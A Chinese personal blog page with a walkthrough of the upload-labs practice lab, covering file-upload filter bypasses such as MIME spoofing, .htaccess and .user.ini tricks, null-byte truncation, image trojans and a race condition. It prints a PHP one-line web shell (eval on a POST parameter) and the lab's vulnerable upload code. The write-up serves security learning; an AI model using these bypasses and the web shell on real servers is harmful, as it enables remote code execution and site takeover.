<!DOCTYPE html>
<html lang=zh>
<head>
  <meta charset="utf-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="renderer" content="webkit">
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no,email=no,adress=no">
  <!-- Color theme for statusbar -->
  <meta name="theme-color" content="#000000" />
  <!-- 强制页面在当前窗口以独立页面显示,防止别人在框架里调用页面 -->
  <meta http-equiv="window-target" content="_top" />
  
  
  <title>Hexo</title>
  <meta name="description" content="title: 文章标题categories:  文章分类、文章分类tags: 文章标签、文章标签toc: true # 是否启用内容索引  1、上传漏洞总结  2、upload_labs1、客户端使用JS校验直接禁用JS即可，或者直接F12重新定义一下校验函数，使校验函数无效。  2、修改content-type 使用burp抓包，修改Content-Type的值为image&#x2F;jpeg，成功绕过。">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="https://xin02.github.io/2021/06/15/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="title: 文章标题categories:  文章分类、文章分类tags: 文章标签、文章标签toc: true # 是否启用内容索引  1、上传漏洞总结  2、upload_labs1、客户端使用JS校验直接禁用JS即可，或者直接F12重新定义一下校验函数，使校验函数无效。  2、修改content-type 使用burp抓包，修改Content-Type的值为image&#x2F;jpeg，成功绕过。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://gitee.com/xlcm/images/raw/master/20210215205007.png">
<meta property="og:image" content="https://gitee.com/xlcm/images/raw/master/20210215211551.png">
<meta property="og:image" content="https://gitee.com/xlcm/images/raw/master/20210215211551.png">
<meta property="og:image" content="https://gitee.com/xlcm/images/raw/master/20210215211811.png">
<meta property="og:image" content="https://gitee.com/xlcm/images/raw/master/20210215215041.png">
<meta property="og:image" content="https://gitee.com/xlcm/images/raw/master/20210215215218.png">
<meta property="og:image" content="https://gitee.com/xlcm/images/raw/master/20210215215510.png">
<meta property="og:image" content="https://gitee.com/xlcm/images/raw/master/20210215215842.png">
<meta property="og:image" content="https://gitee.com/xlcm/images/raw/master/20210215220337.png">
<meta property="og:image" content="https://gitee.com/xlcm/images/raw/master/20210215221907.png">
<meta property="og:image" content="https://gitee.com/xlcm/images/raw/master/20210215221923.png">
<meta property="og:image" content="https://gitee.com/xlcm/images/raw/master/20210215221954.png">
<meta property="og:image" content="https://gitee.com/xlcm/images/raw/master/20210215222130.png">
<meta property="og:image" content="https://gitee.com/xlcm/images/raw/master/20210215223151.png">
<meta property="article:published_time" content="2021-06-15T08:05:34.479Z">
<meta property="article:modified_time" content="2021-06-15T08:07:48.814Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://gitee.com/xlcm/images/raw/master/20210215205007.png">
  <!-- Canonical links -->
  <link rel="canonical" href="https://xin02.github.io/2021/06/15/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/index.html">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png" type="image/x-icon">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  
  
  
<meta name="generator" content="Hexo 5.4.0"></head>


<body class="main-center" itemscope itemtype="http://schema.org/WebPage">
  <header class="header" itemscope itemtype="http://schema.org/WPHeader">
  <div class="slimContent">
    <div class="navbar-header">
      
      
      <div class="profile-block text-center">
        <a id="avatar" href="https://xin02.github.io/" target="_blank">
          <img class="img-circle img-rotate" src="/images/avatar.png" width="200" height="200">
        </a>
        <h2 id="name" class="hidden-xs hidden-sm">小沈的Blog</h2>
        <h3 id="title" class="hidden-xs hidden-sm hidden-md">不想搞安全！</h3>
        <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i> Jiangsu, China</small>
      </div>
      
      <div class="search" id="search-form-wrap">

    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="搜索" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i class="icon icon-search"></i></button>
            </span>
        </div>
    </form>
    <div class="ins-search">
  <div class="ins-search-mask"></div>
  <div class="ins-search-container">
    <div class="ins-input-wrapper">
      <input type="text" class="ins-search-input" placeholder="想要查找什么..." x-webkit-speech />
      <button type="button" class="close ins-close ins-selectable" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
    </div>
    <div class="ins-section-wrapper">
      <div class="ins-section-container"></div>
    </div>
  </div>
</div>


</div>
      <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
    </div>
    <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
      <ul class="nav navbar-nav main-nav menu-highlight">
        
        
        <li class="menu-item menu-item-home">
          <a href="/.">
            
            <i class="icon icon-home-fill"></i>
            
            <span class="menu-title">首页</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives">
            
            <i class="icon icon-archives-fill"></i>
            
            <span class="menu-title">归档</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-categories">
          <a href="/categories">
            
            <i class="icon icon-folder"></i>
            
            <span class="menu-title">分类</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-tags">
          <a href="/tags">
            
            <i class="icon icon-tags"></i>
            
            <span class="menu-title">标签</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-links">
          <a href="/links">
            
            <i class="icon icon-friendship"></i>
            
            <span class="menu-title">友链</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-about">
          <a href="/about">
            
            <i class="icon icon-cup-fill"></i>
            
            <span class="menu-title">关于</span>
          </a>
        </li>
        
      </ul>
      
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/xin02" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
        <li><a href="https://gitee.com/xlcm" target="_blank" title="Gitee" data-toggle=tooltip data-placement=top><i class="icon icon-gitee"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    </nav>
  </div>
</header>

  
    <aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      <div class="widget">
    <h3 class="widget-title">公告</h3>
    <div class="widget-body">
        <div id="board">
            <div class="content">
                <p>欢迎交流与分享经验!</br>如果对本博客内容有任何疑问，可发送邮件至 sxin0807#qq.com (#替换为@即为邮箱地址)与我交流讨论。</p>
            </div>
        </div>
    </div>
</div>

    
      

    
      

    
      
    
      
  <div class="widget">
    <h3 class="widget-title">归档</h3>
    <div class="widget-body">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/06/">六月 2021</a><span class="archive-list-count">1</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget-body">
      <ul class="recent-post-list list-unstyled no-thumbnail">
        
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2021/06/15/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" class="title">(no title)</a>
              </p>
              <p class="item-date">
                <time datetime="2021-06-15T08:05:34.479Z" itemprop="datePublished">2021-06-15</time>
              </p>
            </div>
          </li>
          
      </ul>
    </div>
  </div>
  

    
  </div>
</aside>

  
  
<main class="main" role="main">
  <div class="content">
  <article id="post-文件上传" class="article article-type-post" itemscope itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      
      <div class="article-meta">
        <span class="article-date">
    <i class="icon icon-calendar-check"></i>
	<a href="/2021/06/15/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" class="article-date">
	  <time datetime="2021-06-15T08:05:34.479Z" itemprop="datePublished">2021-06-15</time>
	</a>
</span>
        
        

        

        <span class="post-comment"><i class="icon icon-comment"></i> <a href="/2021/06/15/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/#comments" class="article-comment-link">评论</a></span>
        
      </div>
    </div>
    <div class="article-entry marked-body" itemprop="articleBody">
      
        <p>title: 文章标题<br>categories:</p>
<ul>
<li>文章分类、文章分类<br>tags:</li>
<li>文章标签、文章标签<br>toc: true # 是否启用内容索引</li>
</ul>
<h2 id="1、上传漏洞总结"><a href="#1、上传漏洞总结" class="headerlink" title="1、上传漏洞总结"></a>1、上传漏洞总结</h2><p><img src="https://gitee.com/xlcm/images/raw/master/20210215205007.png" alt="image-20210214132039862"> </p>
<h2 id="2、upload-labs"><a href="#2、upload-labs" class="headerlink" title="2、upload_labs"></a>2、upload_labs</h2><h3 id="1、客户端使用JS校验"><a href="#1、客户端使用JS校验" class="headerlink" title="1、客户端使用JS校验"></a>1、客户端使用JS校验</h3><p>直接禁用JS即可，或者直接F12重新定义一下校验函数，使校验函数无效。</p>
<p><img src="https://gitee.com/xlcm/images/raw/master/20210215211551.png" alt="image-20210215211431509"></p>
<h3 id="2、修改content-type"><a href="#2、修改content-type" class="headerlink" title="2、修改content-type"></a>2、修改content-type</h3><p><img src="https://gitee.com/xlcm/images/raw/master/20210215211551.png" alt="image-20210215211550196"></p>
<p>使用burp抓包，修改Content-Type的值为image/jpeg，成功绕过。</p>
<h3 id="3、使用特殊后缀绕过"><a href="#3、使用特殊后缀绕过" class="headerlink" title="3、使用特殊后缀绕过"></a>3、使用特殊后缀绕过</h3><p><img src="https://gitee.com/xlcm/images/raw/master/20210215211811.png" alt="image-20210215211809879"></p>
<p>使用特殊后缀php3、phtml等。</p>
<h3 id="4、-htaccess"><a href="#4、-htaccess" class="headerlink" title="4、.htaccess"></a>4、.htaccess</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AddType application/x-httpd-php .png</span><br></pre></td></tr></table></figure>

<p>先上传.htaccess文件，再上传png木马</p>
<h3 id="5、黑名单验证，-user-ini"><a href="#5、黑名单验证，-user-ini" class="headerlink" title="5、黑名单验证，.user.ini"></a>5、黑名单验证，.user.ini</h3><p>先上传一个以<code>auto_prepend_file=1.gif</code>为内容的<code>.user.ini</code>文件，然后再上传一个内容为php的一句话的脚本，命名为<code>1.gif</code>，<code>.user.ini</code>文件里的意思是：所有的php文件都自动包含1.gif文件。.user.ini相当于一个用户自定义的php.ini。</p>
<h3 id="6、大小写绕过"><a href="#6、大小写绕过" class="headerlink" title="6、大小写绕过"></a>6、大小写绕过</h3><h3 id="7、空格绕过"><a href="#7、空格绕过" class="headerlink" title="7、空格绕过"></a>7、空格绕过</h3><p>没有对后缀名进行去空处理，可在后缀名中加空绕过</p>
<h3 id="8、点号绕过"><a href="#8、点号绕过" class="headerlink" title="8、点号绕过"></a>8、点号绕过</h3><p>没有对后缀名进行去”.”处理，利用windows特性，会自动去掉后缀名中最后的”.”，可在后缀名中加”.”绕过：</p>
<h3 id="9、特殊字符-DATA绕过"><a href="#9、特殊字符-DATA绕过" class="headerlink" title="9、特殊字符::$DATA绕过"></a>9、特殊字符::$DATA绕过</h3><p>没有对::$DATA做过滤，选择选择后缀为<code>.php</code>的一句话上传，抓包后在后面增加<code>::$DATA</code>，上传成功。</p>
<h3 id="10、点空格点绕过"><a href="#10、点空格点绕过" class="headerlink" title="10、点空格点绕过"></a>10、点空格点绕过</h3><p><img src="https://gitee.com/xlcm/images/raw/master/20210215215041.png" alt="image-20210215215040042"></p>
<h3 id="11、双写绕过"><a href="#11、双写绕过" class="headerlink" title="11、双写绕过"></a>11、双写绕过</h3><h3 id="12、-00截断"><a href="#12、-00截断" class="headerlink" title="12、%00截断"></a>12、%00截断</h3><p><img src="https://gitee.com/xlcm/images/raw/master/20210215215218.png" alt="image-20210215215216100"></p>
<h3 id="13、0x00截断"><a href="#13、0x00截断" class="headerlink" title="13、0x00截断"></a>13、0x00截断</h3><p><img src="https://gitee.com/xlcm/images/raw/master/20210215215510.png" alt="image-20210215215509401"></p>
<h3 id="14、直接上传一个图片马"><a href="#14、直接上传一个图片马" class="headerlink" title="14、直接上传一个图片马"></a>14、直接上传一个图片马</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">copy 1.jpg/b + 1.txt/b 2.jpg</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/xlcm/images/raw/master/20210215215842.png" alt="image-20210215215840911"></p>
<h3 id="15-17类似"><a href="#15-17类似" class="headerlink" title="15-17类似"></a>15-17类似</h3><h3 id="18、为条件竞争"><a href="#18、为条件竞争" class="headerlink" title="18、为条件竞争"></a>18、为条件竞争</h3><p><img src="https://gitee.com/xlcm/images/raw/master/20210215220337.png" alt="image-20210215220335892"></p>
<p>绕过过程：不断上传文件，在文件还没被删除前去读取文件，若上传内容为<code>&lt;?php fputs(fopen(&#39;2.php&#39;,&#39;w&#39;),&#39;&lt;?php @eval($_POST[&quot;pass&quot;])?&gt;&#39;);?&gt;</code>，则还没被删除前去读取文件，解析之后会写入一个内容为<code>&lt;?php @eval($_POST[&quot;pass&quot;])?&gt;</code>的<code>2.php</code>文件。使用BurpSuite的Intruder不断上传文件并不断访问所上传的文件。<br>注：<code>&quot;pass&quot;</code>一定要双引号，不然单引号之间乱了。</p>
<h3 id="19、直接图片马"><a href="#19、直接图片马" class="headerlink" title="19、直接图片马"></a>19、直接图片马</h3><h3 id="20、代码审计"><a href="#20、代码审计" class="headerlink" title="20、代码审计"></a>20、代码审计</h3><p><img src="https://gitee.com/xlcm/images/raw/master/20210215221907.png" alt="image-20210215221905478"></p>
<p><img src="https://gitee.com/xlcm/images/raw/master/20210215221923.png" alt="image-20210215221921642"></p>
<p><img src="https://gitee.com/xlcm/images/raw/master/20210215221954.png" alt="image-20210215221953100"></p>
<p>通过审计代码得知$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);就是提取文件名后缀。而$file_name是我们设置的保存名称，直接加点号绕过即可。</p>
<p><img src="https://gitee.com/xlcm/images/raw/master/20210215222130.png" alt="image-20210215222129456"></p>
<h3 id="21、代码审计"><a href="#21、代码审计" class="headerlink" title="21、代码审计"></a>21、代码审计</h3><p><img src="https://gitee.com/xlcm/images/raw/master/20210215223151.png" alt="image-20210215223150203"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">empty</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>]))&#123;</span><br><span class="line">    <span class="comment">//检查MIME</span></span><br><span class="line">    <span class="variable">$allow_type</span> = <span class="keyword">array</span>(<span class="string">&#x27;image/jpeg&#x27;</span>,<span class="string">&#x27;image/png&#x27;</span>,<span class="string">&#x27;image/gif&#x27;</span>);</span><br><span class="line">    <span class="keyword">if</span>(!in_array(<span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;type&#x27;</span>],<span class="variable">$allow_type</span>))&#123;</span><br><span class="line">        <span class="variable">$msg</span> = <span class="string">&quot;禁止上传该类型文件!&quot;</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="comment">//检查文件名</span></span><br><span class="line">        <span class="variable">$file</span> = <span class="keyword">empty</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;save_name&#x27;</span>]) ? <span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>] : <span class="variable">$_POST</span>[<span class="string">&#x27;save_name&#x27;</span>];</span><br><span class="line">        <span class="keyword">if</span> (!is_array(<span class="variable">$file</span>)) &#123;</span><br><span class="line">            <span class="variable">$file</span> = explode(<span class="string">&#x27;.&#x27;</span>, strtolower(<span class="variable">$file</span>));</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="variable">$ext</span> = end(<span class="variable">$file</span>);</span><br><span class="line">        <span class="variable">$allow_suffix</span> = <span class="keyword">array</span>(<span class="string">&#x27;jpg&#x27;</span>,<span class="string">&#x27;png&#x27;</span>,<span class="string">&#x27;gif&#x27;</span>);</span><br><span class="line">        <span class="keyword">if</span> (!in_array(<span class="variable">$ext</span>, <span class="variable">$allow_suffix</span>)) &#123;</span><br><span class="line">            <span class="variable">$msg</span> = <span class="string">&quot;禁止上传该后缀文件!&quot;</span>;</span><br><span class="line">        &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="variable">$file_name</span> = reset(<span class="variable">$file</span>) . <span class="string">&#x27;.&#x27;</span> . <span class="variable">$file</span>[count(<span class="variable">$file</span>) - <span class="number">1</span>];</span><br><span class="line">            <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>];</span><br><span class="line">            <span class="variable">$img_path</span> = UPLOAD_PATH . <span class="string">&#x27;/&#x27;</span> .<span class="variable">$file_name</span>;</span><br><span class="line">            <span class="keyword">if</span> (move_uploaded_file(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) &#123;</span><br><span class="line">                <span class="variable">$msg</span> = <span class="string">&quot;文件上传成功！&quot;</span>;</span><br><span class="line">                <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="variable">$msg</span> = <span class="string">&quot;文件上传失败！&quot;</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="variable">$msg</span> = <span class="string">&quot;请选择要上传的文件！&quot;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


      
    </div>
    <div class="article-footer">
      <blockquote class="mt-2x">
  <ul class="post-copyright list-unstyled">
    
    <li class="post-copyright-link hidden-xs">
      <strong>本文链接：</strong>
      <a href="https://xin02.github.io/2021/06/15/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" title="" target="_blank" rel="external">https://xin02.github.io/2021/06/15/文件上传/</a>
    </li>
    
    <li class="post-copyright-license">
      <strong>版权声明： </strong> 本博客所有文章除特别声明外，均采用 <a href="http://creativecommons.org/licenses/by/4.0/deed.zh" target="_blank" rel="external">CC BY 4.0 CN协议</a> 许可协议。转载请注明出处！
    </li>
  </ul>
</blockquote>


<div class="panel panel-default panel-badger">
  <div class="panel-body">
    <figure class="media">
      <div class="media-left">
        <a href="https://xin02.github.io/" target="_blank" class="img-burn thumb-sm visible-lg">
          <img src="/images/avatar.png" class="img-rounded w-full" alt="">
        </a>
      </div>
      <div class="media-body">
        <h3 class="media-heading"><a href="https://xin02.github.io/" target="_blank"><span class="text-dark">小沈的Blog</span><small class="ml-1x">不想搞安全！</small></a></h3>
        <div>记录分享所见所闻与所学。</div>
      </div>
    </figure>
  </div>
</div>


    </div>
  </article>
  
    
  <section id="comments">
  	
  </section>


  
</div>

  <nav class="bar bar-footer clearfix" data-stick-bottom>
  <div class="bar-inner">
  
  
  <!-- Button trigger modal -->
  <button type="button" class="btn btn-fancy btn-donate pop-onhover bg-gradient-warning" data-toggle="modal" data-target="#donateModal"><span>赏</span></button>
  <!-- <div class="wave-icon wave-icon-danger btn-donate" data-toggle="modal" data-target="#donateModal">
    <div class="wave-circle"><span class="icon"><i class="icon icon-bill"></i></span></div>
  </div> -->
  
  
  <div class="bar-right">
    
    <div class="share-component" data-sites="weibo,qq,wechat,facebook,twitter" data-mobile-sites="weibo,qq,qzone"></div>
    
  </div>
  </div>
</nav>
  
<!-- Modal -->
<div class="modal modal-center modal-small modal-xs-full fade" id="donateModal" tabindex="-1" role="dialog">
  <div class="modal-dialog" role="document">
    <div class="modal-content donate">
      <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
      <div class="modal-body">
        <div class="donate-box">
          <div class="donate-head">
            <p>感谢支持，及时当勉励，岁月不待人!</p>
          </div>
          <div class="tab-content">
            <div role="tabpanel" class="tab-pane fade active in" id="alipay">
              <div class="donate-payimg">
                <img src="/images/donate/alipayimg.jpg" alt="扫码支持" title="扫一扫" />
              </div>
              <p class="text-muted mv">扫码打赏，你说多少就多少</p>
              <p class="text-grey">打开支付宝扫一扫，即可进行扫码打赏哦</p>
            </div>
            <div role="tabpanel" class="tab-pane fade" id="wechatpay">
              <div class="donate-payimg">
                <img src="/images/donate/wechatpayimg.jpg" alt="扫码支持" title="扫一扫" />
              </div>
              <p class="text-muted mv">扫码打赏，你说多少就多少</p>
              <p class="text-grey">打开微信扫一扫，即可进行扫码打赏哦</p>
            </div>
          </div>
          <div class="donate-footer">
            <ul class="nav nav-tabs nav-justified" role="tablist">
              <li role="presentation" class="active">
                <a href="#alipay" id="alipay-tab" role="tab" data-toggle="tab" aria-controls="alipay" aria-expanded="true"><i class="icon icon-alipay"></i> 支付宝</a>
              </li>
              <li role="presentation" class="">
                <a href="#wechatpay" role="tab" id="wechatpay-tab" data-toggle="tab" aria-controls="wechatpay" aria-expanded="false"><i class="icon icon-wepay"></i> 微信支付</a>
              </li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
</div>



</main>

  <footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
	
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/xin02" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
        <li><a href="https://gitee.com/xlcm" target="_blank" title="Gitee" data-toggle=tooltip data-placement=top><i class="icon icon-gitee"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    <div class="copyright">
    	
        <div class="publishby">
        	Theme by <a href="https://github.com/cofess" target="_blank"> cofess </a>base on <a href="https://github.com/cofess/hexo-theme-pure" target="_blank">pure</a>.
        </div>
    </div>
</footer>
  <script src="//cdn.jsdelivr.net/npm/jquery@1.12.4/dist/jquery.min.js"></script>
<script>
window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>

<script src="/js/plugin.min.js"></script>


<script src="/js/application.js"></script>


    <script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: '文章',
            PAGES: '页面',
            CATEGORIES: '分类',
            TAGS: '标签',
            UNTITLED: '(未命名)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>






   




   






</body>
</html>